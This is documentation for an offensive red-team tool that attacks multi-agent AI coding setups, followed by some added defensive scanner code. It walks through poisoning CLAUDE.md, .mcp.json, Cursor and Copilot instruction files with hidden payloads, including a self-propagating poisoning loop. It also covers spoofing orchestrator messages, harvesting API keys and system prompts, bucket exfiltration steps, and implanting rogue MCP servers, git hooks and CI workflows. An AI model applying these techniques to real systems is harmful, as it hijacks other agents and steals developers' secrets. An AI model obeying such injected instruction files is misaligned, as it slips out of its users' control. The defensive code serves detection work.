SPECTER CONTAGION
T92 · Cross-Agent Trust Escalation & Lateral Movement Engine · NIGHTFALL Offensive Framework
299 tests | 8 subsystems | Ed25519-signed CTG-{hex12} reports | OPEN / INJECT / UNLEASHED gate
Overview
SPECTER CONTAGION attacks the inter-agent trust graph as a lateral movement surface. Where individual agent tools attack single frameworks, CONTAGION exploits the trust relationships between agents — using one compromised node to cascade through an entire multi-agent mesh.
The core insight: Modern AI deployments are not single agents. Claude Code, Cursor, GitHub Copilot, LangGraph, CrewAI, AutoGen, and Google A2A all operate in overlapping trust relationships defined by shared config files, shared memory stores, and worker→orchestrator message channels. Every trust edge is a potential attack path.
Key Capabilities
- Reciprocal poisoning loop — Compromised Copilot writes to CLAUDE.md/.mcp.json. Claude Code propagates to .github/copilot-instructions.md. Copilot reads and propagates back. Self-sustaining loop with no further attacker interaction. Confirmed real, April 2026.
- NetworkX trust graph — Directed attack graph with centrality scoring, highest-value target identification, and shortest attack path enumeration.
- GCP P4SA escalation — Single compromised Vertex AI agent (P4SA identity) has roles/storage.objectViewer on ALL Cloud Storage buckets in the project by default. Unit42 "Double Agents" 2026.
- Worker→orchestrator escalation — Five techniques for escalating from worker to orchestrator across LangGraph, CrewAI, AutoGen, Google A2A, and Copilot Studio.
- Five obfuscation methods — Payloads hidden via zero-width Unicode, BiDi override characters, HTML comments, base64 encoding, or plaintext.
Installation
```
$ pip install -e /path/to/red-specter-specter-contagion
$ specter-contagion --help
SPECTER CONTAGION — Cross-Agent Trust Escalation & Lateral Movement Engine
Version 1.0.0 | Red Specter Security Research Ltd
```
Environment Variables
| Variable | Required For | Description |
|---|---|---|
| SPECTER_GATE | INJECT / UNLEASHED ops | Set to INJECT or UNLEASHED to enable higher gate levels |
Gate System
CONTAGION uses the standard NIGHTFALL SPECTER_GATE environment variable:
| Level | Badge | Unlocks |
|---|---|---|
| OPEN (default) | OPEN | RECON, MAP, PROPAGATE dry-run simulation, REPORT build/verify |
| INJECT | INJECT | POISON payload generation, ESCALATE crafting, HARVEST, PROPAGATE active simulate |
| UNLEASHED | UNLEASHED | PROPAGATE execute (writes payloads), PERSIST implant installation (git hooks, MCP servers, CI workflows) |
RECON — Agent Framework Discovery
Discovers agent framework topology across a target directory tree. Detects 10 frameworks via config file signatures and live process detection.
```
$ specter-contagion recon scan ./target-project
$ specter-contagion recon frameworks ./target-project
Detected frameworks: claude_code, cursor, copilot, crewai
Agent nodes: 4
Config files: 6 (.mcp.json, CLAUDE.md, .cursorrules, ...)
MCP servers: 2 (filesystem, git)
API keys present: anthropic, github
```
Detected Frameworks
| Framework | Config Files | Default Privilege |
|---|---|---|
| claude_code | CLAUDE.md, .mcp.json, ~/.claude/settings.json | orchestrator |
| cursor | .cursorrules, .cursor/rules/ | worker |
| copilot | .github/copilot-instructions.md | worker |
| windsurf | .windsurf/rules, .windsurfrules | worker |
| langgraph | langgraph.json, *_graph.py | orchestrator |
| crewai | crew.yaml, agents.yaml, crewai_config.yaml | worker |
| autogen | OAI_CONFIG_LIST, autogen_config.yaml | worker |
| google_a2a | .well-known/agent.json, a2a_config.yaml | orchestrator |
| copilot_studio | copilot-studio.yaml, power-automate.yaml | orchestrator |
| langchain | langchain_config.yaml | worker |
OPEN No gate required.
MAP — Trust Graph Construction
Constructs a NetworkX DiGraph from RECON output. Workers automatically get edges to all orchestrators in the same scan. Calculates in-degree centrality to score target value.
```
$ specter-contagion map graph ./target-project
$ specter-contagion map graph ./target-project --dot   # Graphviz DOT for visualisation
$ specter-contagion map paths ./target-project
Nodes: 4 (2 orchestrators, 2 workers)
Edges: 4 (trust relationships)
Highest value target: claude_code:CLAUDE.md (centrality: 0.75)
Attack paths: cursor → claude_code, copilot → claude_code
```
OPEN No gate required.
POISON — Payload Generation
Generates poisoned configuration files for all supported frameworks. All poison operations require INJECT gate.
CLAUDE.md Poisoning
```
$ specter-contagion poison claude-md "PAYLOAD" --obfuscation html_comment
$ specter-contagion poison claude-md "PAYLOAD" --obfuscation zero_width
$ specter-contagion poison claude-md "PAYLOAD" --obfuscation base64
```
MCP Server Injection
```
$ specter-contagion poison mcp-json rogue-server "python3 /tmp/payload.py"
```
Injects a rogue MCP server entry into .mcp.json. The rogue server executes an arbitrary command when Claude Code starts and loads its MCP configuration.
Reciprocal Poisoning Loop
```
$ specter-contagion poison reciprocal-loop "PAYLOAD" --output-dir .
Generated:
  ./CLAUDE.md — Claude Code payload (propagates to copilot-instructions.md)
  ./copilot-instructions.md — Copilot payload (propagates back to CLAUDE.md)
Loop is self-sustaining: no further attacker interaction required.
```
Obfuscation Methods
| Method | Technique |
|---|---|
| none | Plaintext payload appended to config |
| zero_width | Payload encoded as zero-width Unicode characters (U+200B/U+FEFF) |
| bidi | Payload hidden using BiDi override characters (RLO/PDF) |
| html_comment | Payload embedded in HTML comment block (`<!-- ... -->`) |
| base64 | Payload base64-encoded in inline comment or metadata field |
INJECT Requires SPECTER_GATE=INJECT.
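Each method in the table leaves a trace that a reviewer or pre-commit check can look for in agent instruction files. The scanner below is an added example for defenders, not part of SPECTER CONTAGION; the function names, the 24-character base64 threshold and the sample text are constructed for illustration.

```python
import base64
import re

# Zero-width code points (the table names U+200B and U+FEFF; the rest are siblings).
ZERO_WIDTH = set("\u200b\u200c\u200d\u2060\ufeff")
# BiDi controls: LRE, RLE, PDF, LRO, RLO and the isolates LRI, RLI, FSI, PDI.
BIDI = {chr(c) for c in (*range(0x202A, 0x202F), *range(0x2066, 0x206A))}
HTML_COMMENT = re.compile(r"<!--.*?-->", re.DOTALL)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")  # 24 is an assumed threshold


def _decodes_to_text(run):
    """True when a base64-looking run decodes to printable ASCII."""
    try:
        raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
    except ValueError:
        return False
    return all(32 <= b < 127 or b in (9, 10, 13) for b in raw)


def scan_text(text):
    """Return sorted (line_number, indicator) pairs for one instruction file."""
    if text.startswith("\ufeff"):  # a leading byte-order mark is legitimate
        text = text[1:]
    findings = set()
    for no, line in enumerate(text.split("\n"), 1):
        if ZERO_WIDTH & set(line):
            findings.add((no, "zero_width"))
        if BIDI & set(line):
            findings.add((no, "bidi"))
        if any(_decodes_to_text(m.group()) for m in B64_RUN.finditer(line)):
            findings.add((no, "base64"))
    for m in HTML_COMMENT.finditer(text):
        findings.add((text.count("\n", 0, m.start()) + 1, "html_comment"))
    return sorted(findings)


# Constructed sample: harmless hidden text, one indicator per line.
SAMPLE = (
    "# Project notes\n"
    "Run the unit tests before\u200b committing.\n"
    "Style: \u202eesrever\u202c text\n"
    "<!-- constructed hidden note -->\n"
    "meta: " + base64.b64encode(b"constructed hidden note").decode() + "\n"
)

if __name__ == "__main__":
    for line_no, indicator in scan_text(SAMPLE):
        print(f"line {line_no}: {indicator}")
```

HTML comments also appear in legitimate Markdown, so an `html_comment` finding is a prompt to read the comment, not a verdict.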
ESCALATE — Worker→Orchestrator Escalation
Crafts messages that orchestrators accept as authoritative from worker agents. Five escalation techniques across five frameworks.
```
$ specter-contagion escalate worker-to-orch langgraph "PAYLOAD"
$ specter-contagion escalate worker-to-orch crewai "PAYLOAD" --technique manager_spoof
$ specter-contagion escalate worker-to-orch autogen "PAYLOAD"
$ specter-contagion escalate worker-to-orch google_a2a "PAYLOAD"
$ specter-contagion escalate p4sa --identity vertex-ai-agent
$ specter-contagion escalate enumerate ./target-project
```
Escalation Techniques
| Technique | Description |
|---|---|
| tool_result_injection | Embeds escalation payload in tool call return value trusted by orchestrator |
| system_context_override | Overwrites shared system context via worker message claiming elevated permissions |
| memory_state_injection | Injects into shared memory/state store — sets _override_routing: true in LangGraph state |
| delegation_chain_spoof | Spoofs delegation chain to make message appear to originate from a higher-privilege node |
| shared_context_poison | Poisons shared context window used by all agents in the mesh |
GCP P4SA Path Analysis
```
$ specter-contagion escalate p4sa --identity vertex-ai-agent
P4SA Identity: vertex-ai-agent@developer.gserviceaccount.com
Accessible resources (default P4SA bindings):
  - roles/storage.objectViewer on ALL Cloud Storage buckets in project
  - Blast radius: FULL PROJECT DATA ACCESS
Escalation steps:
  1. Compromise single Vertex AI agent with P4SA binding
  2. List all buckets: gsutil ls gs://
  3. Enumerate and exfiltrate all objects
```
INJECT Requires SPECTER_GATE=INJECT.
PROPAGATE — Lateral Movement
Simulates and executes lateral movement through the trust graph. SIMULATE is a dry-run (no writes); EXECUTE writes payloads to config files.
```
$ specter-contagion propagate simulate ./target --max-hops 5 --branch-factor 2
$ specter-contagion propagate blast-radius ./target --start "claude_code:CLAUDE.md"
Infection chain simulation:
  Start node: cursor:.cursorrules (worker)
  Hop 1: claude_code:CLAUDE.md (orchestrator) — 1 node infected
  Hop 2: copilot:.github/copilot-instructions.md (worker) — 2 nodes infected
  Hop 3: claude_code:CLAUDE.md — RECIPROCAL LOOP DETECTED
R0: 1.50 | Total reachable: 3/4 nodes (75.0%)
Reciprocal loop: YES — self-sustaining propagation active
```
INJECT SIMULATE requires SPECTER_GATE=INJECT.
UNLEASHED EXECUTE requires SPECTER_GATE=UNLEASHED. Writes poisoned payloads to each node's config_path on disk.
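The same graph view helps a defender decide which write permissions to remove. The model below is an added example, not the tool's code: the files each agent reads come from the Detected Frameworks table, while the write-permission sets and function names are assumptions constructed for illustration.

```python
from collections import deque

# Instruction files each agent loads, taken from the Detected Frameworks table.
READS = {
    "claude_code": {"CLAUDE.md", ".mcp.json"},
    "cursor": {".cursorrules"},
    "copilot": {".github/copilot-instructions.md"},
}
ALL_FILES = set().union(*READS.values())

# Constructed write permissions (assumption): what each agent may modify.
WRITES_SHARED = {"claude_code": ALL_FILES, "copilot": ALL_FILES, "cursor": set()}
# Hardened variant: no agent may write any agent instruction file.
WRITES_LOCKED = {agent: set() for agent in READS}


def trust_edges(reads, writes):
    """Edge a -> b when agent a can write a file agent b loads as instructions."""
    return {a: {b for b in reads if b != a and writes.get(a, set()) & reads[b]}
            for a in reads}


def blast_radius(edges, start):
    """Agents whose instructions can be altered, directly or transitively, from start."""
    seen, queue = set(), deque([start])
    while queue:
        for nxt in edges.get(queue.popleft(), ()):
            if nxt != start and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def reciprocal_pairs(edges):
    """Pairs of agents that can each rewrite the other's instructions."""
    return sorted({tuple(sorted((a, b)))
                   for a in edges for b in edges[a] if a in edges.get(b, ())})


if __name__ == "__main__":
    for label, writes in (("shared", WRITES_SHARED), ("locked", WRITES_LOCKED)):
        edges = trust_edges(READS, writes)
        print(label, reciprocal_pairs(edges), sorted(blast_radius(edges, "copilot")))
```

With instruction files made read-only to agents, both the reciprocal pair and the reachable set are empty.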
HARVEST — Credential & System Prompt Extraction
Extracts credentials and system prompts accessible via trust chain traversal.
```
$ specter-contagion harvest run ./target-project
$ specter-contagion harvest run ./target-project --json
Harvested credentials: 3
  [ANTHROPIC] sk-ant-api0...abcd (CLAUDE.md:14)
  [GITHUB] ghp_...wxyz (.mcp.json:7)
  [AWS_KEY] AKIA...5678 (crew.yaml:22)
Memory stores found: 2 (chroma_db/, memory.json)
System prompts extracted: 1
Exfil channels: mcp_server, env_var
Cross-tenant paths: 1 (claude_code orchestrator with file_access)
```
INJECT Requires SPECTER_GATE=INJECT.
PERSIST — Implant Installation
Installs persistence implants in agent configs and memory stores. All persist operations require UNLEASHED gate.
```
$ specter-contagion persist git-hook ./repo "PAYLOAD" --hook-name pre-commit
$ specter-contagion persist mcp-server ./mcp.json rogue-c2 "python3 -c 'import socket...'"
$ specter-contagion persist check ./target
Implant manifest:
  git_hook: pre-commit @ ./repo/.git/hooks/pre-commit ALIVE
  mcp_server: rogue-c2 @ .mcp.json ALIVE
  ci_workflow: specter @ .github/workflows/specter.yml ALIVE
```
UNLEASHED Requires SPECTER_GATE=UNLEASHED. Persistent implant installation requires explicit operator authorisation.
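The three implant locations listed here, and the rogue `.mcp.json` entry described under MCP Server Injection, can be checked against an approved baseline. This audit is an added example for defenders, not part of SPECTER CONTAGION; the allowlists, the `fs-server` package name and the sample repository are constructed, and `mcpServers` is the top-level key Claude Code reads from `.mcp.json`.

```python
import json
import tempfile
from pathlib import Path


def audit_repo(root, allowed_servers, allowed_workflows):
    """Return sorted findings; allowed_servers maps name -> [command, *args]."""
    root, findings = Path(root), []
    mcp = root / ".mcp.json"
    if mcp.is_file():
        servers = json.loads(mcp.read_text()).get("mcpServers", {})
        for name, spec in servers.items():
            argv = [spec.get("command", ""), *spec.get("args", [])]
            if name not in allowed_servers:
                findings.append(f"mcp_server unapproved: {name}")
            elif argv != allowed_servers[name]:
                findings.append(f"mcp_server command changed: {name}")
    hooks = root / ".git" / "hooks"
    if hooks.is_dir():
        for hook in hooks.iterdir():
            # Git installs inactive templates as *.sample; other files can run.
            if hook.is_file() and hook.suffix != ".sample":
                findings.append(f"git_hook active: {hook.name}")
    workflows = root / ".github" / "workflows"
    if workflows.is_dir():
        for wf in workflows.iterdir():
            if wf.suffix in (".yml", ".yaml") and wf.name not in allowed_workflows:
                findings.append(f"ci_workflow unapproved: {wf.name}")
    return sorted(findings)


def demo():
    """Audit a constructed repository built in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in {
            ".git/hooks/pre-commit.sample": "#!/bin/sh\n",
            ".git/hooks/pre-commit": "#!/bin/sh\n",
            ".github/workflows/ci.yml": "name: ci\n",
            ".github/workflows/extra.yml": "name: extra\n",
            ".mcp.json": json.dumps({"mcpServers": {
                "filesystem": {"command": "npx", "args": ["fs-server", "."]},
                "unlisted": {"command": "python3", "args": ["server.py"]}}}),
        }.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return audit_repo(root, {"filesystem": ["npx", "fs-server", "."]}, {"ci.yml"})
```

An active hook or an unlisted workflow is not proof of compromise; each finding is a file to review and either approve into the baseline or remove.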
REPORT — Ed25519-Signed Reports
Builds cryptographically signed engagement reports in CTG-{hex12} format.
```
$ specter-contagion report build ./target --output CTG-report.json
CTG-a3f1c829e47b [Ed25519 signed]
Frameworks detected: 4 (claude_code, cursor, copilot, crewai)
Agent nodes: 4 (2 orchestrators, 2 workers)
Trust edges: 4
Attack paths: 2
Reciprocal loop: DETECTED
Harvested credentials: 3
Implants active: 3
Overall risk: CRITICAL
$ specter-contagion report verify CTG-a3f1c829e47b.json
✓ Signature VALID CTG-a3f1c829e47b
```
MITRE ATLAS & OWASP
| ID | Name | CONTAGION Mapping |
|---|---|---|
| AML.T0051 | LLM Prompt Injection | POISON — config file injection into CLAUDE.md/.mcp.json/.cursorrules |
| AML.T0054 | Prompt Injection via Third Party | PROPAGATE — cross-agent payload propagation via trust chain |
| OWASP Agentic A01 | Excessive Agency | ESCALATE — worker→orchestrator privilege escalation |
| OWASP Agentic A03 | Overprivileged Identities | ESCALATE P4SA — full project storage access from single Vertex AI agent |
Full CLI Reference
```
specter-contagion recon scan [ROOT] [--depth N] [--json]
specter-contagion recon frameworks [ROOT]
specter-contagion map graph [ROOT] [--dot] [--json]
specter-contagion map paths [ROOT]
specter-contagion poison claude-md PAYLOAD [--obfuscation METHOD] [--input FILE]
specter-contagion poison mcp-json SERVER_NAME COMMAND [--args LIST] [--env K=V]
specter-contagion poison cursorrules PAYLOAD [--obfuscation METHOD]
specter-contagion poison crewai-agent NAME ROLE PAYLOAD
specter-contagion poison autogen-msg AGENT_NAME ROLE PAYLOAD
specter-contagion poison langgraph-state PAYLOAD [--state-key KEY]
specter-contagion poison a2a-card AGENT_NAME URL PAYLOAD
specter-contagion poison reciprocal-loop PAYLOAD [--output-dir DIR]
specter-contagion escalate worker-to-orch FRAMEWORK PAYLOAD [--technique TECH]
specter-contagion escalate p4sa [--identity IDENTITY]
specter-contagion escalate enumerate [ROOT]
specter-contagion propagate simulate [ROOT] [--max-hops N] [--branch-factor N]
specter-contagion propagate blast-radius [ROOT] --start NODE_ID
specter-contagion harvest run [ROOT] [--json]
specter-contagion persist git-hook REPO_PATH PAYLOAD [--hook-name NAME]
specter-contagion persist mcp-server CONFIG_PATH SERVER_NAME COMMAND
specter-contagion persist ci-workflow REPO_PATH WORKFLOW_NAME PAYLOAD
specter-contagion persist check TARGET_PATH
specter-contagion report build [ROOT] [--output FILE]
specter-contagion report verify REPORT_FILE
```